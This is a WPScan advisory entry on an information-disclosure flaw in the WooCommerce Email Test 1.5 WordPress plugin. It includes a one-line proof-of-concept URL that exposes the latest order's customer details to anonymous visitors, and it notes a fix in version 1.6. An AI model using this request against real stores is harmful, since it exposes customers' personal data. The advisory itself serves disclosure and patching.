WooCommerce Email Test 1.5 - Order Information Disclosure



Description
When this plugin is installed, any anonymous user can open this url

https://www.domainname.de/?woocommerce_email_test=WC_Email_Customer_Completed_Order

..which shows the last (most recent) order along with all customer details, email address and cart content.

This is a severe security/data privacy breach and unlawful in (at least) germany.
Proof of Concept
Replace "domainname" with a domain to be tested:

https://www.domainname.de/?woocommerce_email_test=WC_Email_Customer_Completed_Order

Affects Plugin

fixed in version 1.6

References

URL https://plugins.trac.wordpress.org/changeset/1549532/woocommerce-email-test

Classification

Type BYPASS

Miscellaneous

Submitter jansass GmbH
Submitter Website www.jansass.com
Views 445
Verified No
WPVDB ID 8689

Timeline

Publicly Published 2016-12-08 (almost 2 years ago)
Added 2016-12-09 (almost 2 years ago)
Last Updated 2018-09-02 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.